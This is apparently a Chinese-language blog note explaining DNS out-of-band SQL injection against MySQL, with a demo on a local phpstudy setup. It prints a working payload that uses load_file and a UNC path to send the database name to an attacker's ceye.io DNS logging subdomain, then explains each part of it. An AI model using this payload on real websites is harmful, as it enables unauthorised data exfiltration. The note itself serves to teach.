Dns注入

• 2019 年 10 月 7 日
• 笔记

为什么要使用DNS注入？

盲注跑数据太慢的情况下，可以选择DNS注入

DNS注入的原理？

域名DNS指向的是我们服务器的域名，意味着解析域名时需向DNS服务器查询。通过递归查询可以获取数据库上的信息。要记住整个域名内的节点标签被限制在63个字符长度大小。

使用条件：

1. 有sql注入点

2. 该站点的load_file可以使用

演示：

本地搭建phpstudy环境

然后注册一个ceye.io的账号，作为dns注入的平台

用到的东西呢就是下图中画圈的

这是一个域名:

分析一下：

Ceye.io 就不用说了，

前面的 xxxx.ceye.io是你的个人域名

Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。例如：

你得到的数据库是test

那么效果则是:test.xxxx.ceye.io

好的，废话不多说，实例演示

使用到的语句呢就是下面这条：

and if((select load_file(concat('\\',(select database()),'.eq6w9l.ceye.io\abc'))),1,0)

分析一下：

And 就不多说了，连接前后语句嘛！

If（1,2,3）这个函数，里面是三个条件，如果1这个位置是true那么执行2位置语句，否则执行3位置语句。

我们都知道，load_file是可以读取文件的，那么，我们把这个文件换成可执行的语句呢？

再说一个小知识点，\xxxxx.xxxxxx

如果说我们在下图位置写这个东西呢，就会执行这个后面的域名吧！

同理，你在load_file中写这个也是会执行的，所以就利用这个特点进行的dns注入。

'\\',(select database()),'.eq6w9l.ceye.io\abc'

首先前面的\\实际上是两个其中两个是作为转义符号来的，然后（select database()）是真正的执行语句，然后后面拼接上你的域名，最后面加的\abc，实例发现，后面不加\abc或者\其他字符是无法进行dns注入的，必须加上\abc或者\aaa等等都可以，但是记住一定要加。

Ok，payload已经写好了，就执行吧！

效果

那么究竟对不对呢？

我们联合注入看一下：

Dns注入呢到这里基本已经算是ok了！

其他的语句也同样一样！